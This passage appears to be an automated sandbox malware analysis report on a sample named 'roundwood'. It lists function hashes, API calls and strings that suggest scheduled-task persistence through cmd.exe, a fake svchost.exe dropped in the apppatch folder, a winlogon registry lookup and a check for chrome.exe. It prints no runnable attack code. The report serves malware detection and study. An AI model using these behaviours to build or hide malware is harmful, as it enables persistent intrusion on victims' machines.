Function 00443770 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c265ff65fe4c7ddf80da19a666888597f66043daa1ae6aea08b2ec6ac2f3f707
Instruction ID: 2a274e8a1ad40154ec6af4747db823c3f994c06c50863bccb78ad997ff61118a
Opcode Fuzzy Hash: c265ff65fe4c7ddf80da19a666888597f66043daa1ae6aea08b2ec6ac2f3f707
Instruction Fuzzy Hash: AC021530A017459FEB20CF18C490AAEB7F1FF41B11F18815AE8E59B391D339AE46CB94

Function 00441240 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df987b23289ee04ce400f9caf8f2ac37f746e7da7383059cc081eab776726bd
Instruction ID: e8756846642be90abbdebc3e51230c0e069d03c092d075b54a71e7ce150ad093
Opcode Fuzzy Hash: 6df987b23289ee04ce400f9caf8f2ac37f746e7da7383059cc081eab776726bd
Instruction Fuzzy Hash: B702E730A057459FEB20CF18C580AAFB7F1FF91310F18855AE8A68B3A1D738AD82C755

Function 004090E0 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a663dd55d58596cb96512908de84d3ffce2d6009d3170a9e5fb7a2fdfdc5c926
Instruction ID: 2f667d1f173bafce8e1427c15ece2f47d9d4cf61a284c9476ac3f855bb14d006
Opcode Fuzzy Hash: a663dd55d58596cb96512908de84d3ffce2d6009d3170a9e5fb7a2fdfdc5c926
Instruction Fuzzy Hash: 56F19D71A0021AABDB10CF59D984BAFB7B4FF89314F10416AED05AB382D779DD41CBA4

Function 0043A7A0 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc633f8a66651507d519b18302154a8b56194e6f441ade08eecc1b0582a71b74
Instruction ID: 9c2bf2eb3bc8d3effd0330e87da942dcbd05d366be1e22ae6a96fd6cb05b729e
Opcode Fuzzy Hash: bc633f8a66651507d519b18302154a8b56194e6f441ade08eecc1b0582a71b74
Instruction Fuzzy Hash: F2123971E002198FCF08CF99C9906ADFBF2BF88314F18916AD899AB754D738A951CB54

Function 004403F0 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42139abc3ffd798a773c451483f9a31d36512b6a1ddc4dab2380ab3743eb7a2d
Instruction ID: c261eb99067101d40d0f18de06a2b3948b1c8e435b3aa0119f3931cf21f67512
Opcode Fuzzy Hash: 42139abc3ffd798a773c451483f9a31d36512b6a1ddc4dab2380ab3743eb7a2d
Instruction Fuzzy Hash: 79E12930A057459FFB25CF28C4906AEBBE1FF92310F1481AFD5E64B391C239A856CB55

Function 0044A410 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a28db560a375c6abcebf6c3ee7d3ff37af9ee48000ecd15332263634e69ec2
Instruction ID: 3a9d95ed390408800039c1f3849d26610303243ba5ea242cbb4dce25a4e3c13c
Opcode Fuzzy Hash: 07a28db560a375c6abcebf6c3ee7d3ff37af9ee48000ecd15332263634e69ec2
Instruction Fuzzy Hash: 18E10430E046558FDB08CF68C5806ADBBF2EF89310F28C1AED895DB342D639DA46CB55

Function 0043BC40 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d418897d6c6a607d9eedbaecd746079996b30e4215d991710b5601b1c0f57d78
Instruction ID: 5a37b0648728958f0288bb4f7ac6d4aba95f21994ba20fc5e025a7a006478983
Opcode Fuzzy Hash: d418897d6c6a607d9eedbaecd746079996b30e4215d991710b5601b1c0f57d78
Instruction Fuzzy Hash: CDD14772E0021A8FCB18CF99C9816EEFBB2FF98310F15912AD955AB744D734A901CF94

Function 0044DFC3 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: 04dee21a32c53965aa5b938a88bd97a44c4ba16e36ef5f5c0a04e954fdb79b0e
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: 6381A4319893918BCB95DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51

Function 00406B60 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c780ae43a90426060a3544af387a16ad49e5268ea46b211455b66f1143b4994
Instruction ID: 9376e5c992562f3e00e2254617bc072180117d3474245450927de628b66f820d
Opcode Fuzzy Hash: 8c780ae43a90426060a3544af387a16ad49e5268ea46b211455b66f1143b4994
Instruction Fuzzy Hash: 8D814171D01215AFDB50EFA5C841B9EB7B5AF48314F26847EE805B7381D738AD11CBA8

Function 0043C780 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
Instruction ID: 52b51f466a7fff8df6a645b0fc373324c6dabd8578bc889902f10df3be222477
Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
Instruction Fuzzy Hash: D951C433F215214BF348EA7ACC8415A73D3EBCA31075AC23AD901DB395E974E96396C4

Function 0040EA40 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7903d2f27aa9249a91df88b3081f7ec253c2a7590132b0b29ce9056827596fcf
Instruction ID: 1e85c0a7481e4e4fd660c7700b1cffa9ef74280aecd845eca65ecbbee168b463
Opcode Fuzzy Hash: 7903d2f27aa9249a91df88b3081f7ec253c2a7590132b0b29ce9056827596fcf
Instruction Fuzzy Hash: A8518C7190C3918BD311CF2AC48066BBBE1AFDA314F044E6EF8C4A7351D7799A498B96

Function 0043C5A0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
Instruction ID: 233641ecc840252a1fc0e28f7a8495337fee8d5f73a79ec8e34192ffb94c1fa4
Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
Instruction Fuzzy Hash: 9F41C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0

Function 0040EC60 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677ccf3ef613ba1445ea4e47055c97133223e5db12119d95f35b79f51fc9afce
Instruction ID: 982f5cbd81f6543f6bfa01c041187c3b3289f829b31c426caf68f299339906e7
Opcode Fuzzy Hash: 677ccf3ef613ba1445ea4e47055c97133223e5db12119d95f35b79f51fc9afce
Instruction Fuzzy Hash: D851C27150C3A28BD311CF2AC48466BBBE1AFD9314F084E6EE8D497351D378DA49CB96

Function 0042E6E0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e70f0b26bb4a857cbc1470cafd2cc077ff3004965e96456ca00bb8093ff93c1
Instruction ID: aa575491994ff2620d76e793d25d9d15f22605b549845f0db131f6ffb0de12b4
Opcode Fuzzy Hash: 9e70f0b26bb4a857cbc1470cafd2cc077ff3004965e96456ca00bb8093ff93c1
Instruction Fuzzy Hash: CC217C339B44BB02E7508E728C8463277E3DFCB606FAF85B6D648C7652D23DD4029124

Function 00414540 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
Instruction ID: d8bd486f3b2b5881354ed63866940f8bb74c1bb7b7e3e17938e3daae00a15605
Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
Instruction Fuzzy Hash: 3801C93B074E0E638519411C5024AFA11425B9279A7D4062BABCBD83D1EFCDD8D7D04F

Function 00413DA0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0dfc14e31f44cf4e014f2097966a418c44037349c65fa29245ceabfdf450b4f
Instruction ID: aaf8394e51d366f1cbaff26a72c6c9576496a1c1027a8e2768253c57e0b02b0d
Opcode Fuzzy Hash: c0dfc14e31f44cf4e014f2097966a418c44037349c65fa29245ceabfdf450b4f
Instruction Fuzzy Hash: 4C01F2B19043289FEB20CF54D88579ABBB4FB01304F40809DE98D93280C3B51A94CB96

Function 00406800 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40

Function 004034E9 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403643
wcsstr.MSVCRT ref: 00403662
wcsstr.MSVCRT ref: 00403695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040372B
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040375C
SetEndOfFile.KERNEL32(00000000), ref: 00403763
CloseHandle.KERNEL32(00000000), ref: 0040376A
VariantInit.OLEAUT32(00000000), ref: 0040379B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F7
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037FA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403807
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040380A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040381D
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403820
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040382D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403830

Strings

00-->, xrefs: 0040368F
<Actions , xrefs: 0040365A
p=)u, xrefs: 0040379B

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
String ID: 00-->$<Actions $p=)u
API String ID: 3028510665-3614734336
Opcode ID: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction ID: 013638ac99e31dc1b3f0b1cbc1bcbf050739cfec6944e8e6b412d7e6261d8edc
Opcode Fuzzy Hash: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction Fuzzy Hash: 32A1C0B1500311ABC720DF64CC49F5B7BA8EFC8751F048A69FA49A7391D774EA04CBA4

Function 00402EA0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 436commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?), ref: 00402EB0
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402ED0
CoCreateInstance.OLE32(004043E8,00000000,00000001,004041D8,?), ref: 00402EF7
VariantInit.OLEAUT32(?), ref: 00402F0F
VariantInit.OLEAUT32(?), ref: 00402F2A
VariantInit.OLEAUT32(?), ref: 00402F48
VariantInit.OLEAUT32(?), ref: 00402F66
VariantClear.OLEAUT32(?), ref: 00402FEC
VariantClear.OLEAUT32(?), ref: 00402FF2
VariantClear.OLEAUT32(?), ref: 00402FF8
VariantClear.OLEAUT32(?), ref: 00402FFE
InterlockedDecrement.KERNEL32(.5@), ref: 0040303D
SysAllocString.OLEAUT32(00404F3C), ref: 004031E6
VariantInit.OLEAUT32(?), ref: 0040320B
VariantInit.OLEAUT32(?), ref: 00403229

Part of subcall function 00402DC0: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00403011,00404F28), ref: 00402DC8
Part of subcall function 00402DC0: HeapAlloc.KERNEL32(00000000,?,00403011,00404F28), ref: 00402DCF
Part of subcall function 00402DC0: SysAllocString.OLEAUT32(00403011), ref: 00402DF0

VariantClear.OLEAUT32(?), ref: 004032D6
VariantClear.OLEAUT32(?), ref: 004032DC
VariantClear.OLEAUT32(?), ref: 004032E2

Strings

.5@, xrefs: 0040306D, 00403237, 00403070, 00403240
p=)u, xrefs: 00402F05, 004031F2
.5@, xrefs: 00403009, 00403030, 00403071, 00403095, 00403146, 00403166, 004031AA, 004031CA, 00403241, 004032C8, 0040303C
cmd.exe, xrefs: 00403141

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
String ID: .5@$.5@$cmd.exe$p=)u
API String ID: 2839743307-1153045067
Opcode ID: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction ID: 7356d6b497d974f43c465eb486c8ab872bac2c341a44699d5e6db9722a73acc6
Opcode Fuzzy Hash: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction Fuzzy Hash: 65F1EA75E102199FCB00DFA8C884A9EBBB9FF88710F15816AE914BB391D774AD41CF94

Function 00401FB0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401FD6
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
GetLastError.KERNEL32 ref: 00401FF0
SwitchToThread.KERNEL32 ref: 00401FFF
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
CloseHandle.KERNEL32(00000000), ref: 00402039
Module32First.KERNEL32(00000000,?), ref: 0040205A
StrStrIA.SHLWAPI(?,kernel), ref: 0040207C
StrStrIA.SHLWAPI(00000000,.dll), ref: 00402088
Module32Next.KERNEL32(00000000,00000224), ref: 00402096

Strings

kernel, xrefs: 00402070
.dll, xrefs: 00402082

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
String ID: .dll$kernel
API String ID: 2979424695-2375045364
Opcode ID: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction ID: 8973f4922baf9af671f2a19144e2d86d5cf9878df638c7e503d434612b68899c
Opcode Fuzzy Hash: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction Fuzzy Hash: F721EB7190131477D7109BA5AE4DB9F77A8ABC8310F100276EB04F32D1DB789E41C669

Function 00402E40 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00402E47
GetProcessHeap.KERNEL32(00000000,?,.5@,7529E610,00402E2E), ref: 00402E5F
HeapValidate.KERNEL32(00000000), ref: 00402E62
GetProcessHeap.KERNEL32(00000000,?), ref: 00402E6F
HeapFree.KERNEL32(00000000), ref: 00402E72
GetProcessHeap.KERNEL32(00000000,.5@,.5@,7529E610,00402E2E), ref: 00402E7B
HeapValidate.KERNEL32(00000000), ref: 00402E7E
GetProcessHeap.KERNEL32(00000000,.5@), ref: 00402E8B
HeapFree.KERNEL32(00000000), ref: 00402E8E

Strings

.5@, xrefs: 00402E54, 00402E78, 00402E88

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Validate$String
String ID: .5@
API String ID: 2629017576-427766238
Opcode ID: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction ID: 8a0f41a42cc1d9b8d1979a4e7edab232083dfb301258e97597ac6d2db269471b
Opcode Fuzzy Hash: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction Fuzzy Hash: 10F0FEB2641211ABE6106BB59E4CF5B3A5CEF95B56F044525B708F71D0CA74CC0086B8

Function 00401600 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040160B
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Strings

RtlUniform, xrefs: 00401626
ntdll.dll, xrefs: 00401617
)@, xrefs: 00401644

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll$)@
API String ID: 1545651562-3472953331
Opcode ID: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction ID: a861cb93b7f16bf3c872219f5ba967f96d5ad720afefe63f3816ea97d3f010e1
Opcode Fuzzy Hash: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction Fuzzy Hash: 89E01AB0600310DBEB009FB2AD09A563699AA94B113448836A709F21E2DA3CD810CA6D

Function 00401920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040194A
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

Strings

RtlUniform, xrefs: 0040195D
ntdll.dll, xrefs: 00401952

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction ID: 42b0d571b2b9ac5a956892dcf26f74189b3fac86f907fc126faefe0e596b578b
Opcode Fuzzy Hash: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction Fuzzy Hash: B601A771600314DBC7149FBAAC81996B759AB88B15710443AEA09E32D3C63DDC05CBBC

Analysis Process: svchost.exePID: 5284, Parent PID: 5852COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	79.3%
Signature Coverage:	30.2%
Total number of Nodes:	943
Total number of Limit Nodes:	27

Executed Functions

Function 02D167D0 Relevance: 280.9, APIs: 126, Strings: 34, Instructions: 881threadmemorylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D03440: memset.MSVCRT ref: 02D0347B
Part of subcall function 02D03440: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02D0349A
Part of subcall function 02D03440: PathAddBackslashA.SHLWAPI(?), ref: 02D034A7
Part of subcall function 02D03440: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02D034C4
Part of subcall function 02D03440: _snprintf.MSVCRT ref: 02D034DF
Part of subcall function 02D03440: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02D03503
Part of subcall function 02D03440: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D0351F
Part of subcall function 02D03440: PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D035AD

Part of subcall function 02D255C0: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D255EF
Part of subcall function 02D255C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02D25628
Part of subcall function 02D255C0: _snprintf.MSVCRT ref: 02D25693

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02D167F0
PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02D167FB
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D1680F
StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02D1682B
GetCommandLineA.KERNEL32 ref: 02D16835
GetCommandLineW.KERNEL32 ref: 02D1686D
InitializeCriticalSection.KERNEL32(02D4FB68), ref: 02D1689B
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D168B2
CreateThread.KERNEL32(00000000,00000000,02D13140,00000000,00000000,00000000), ref: 02D16900
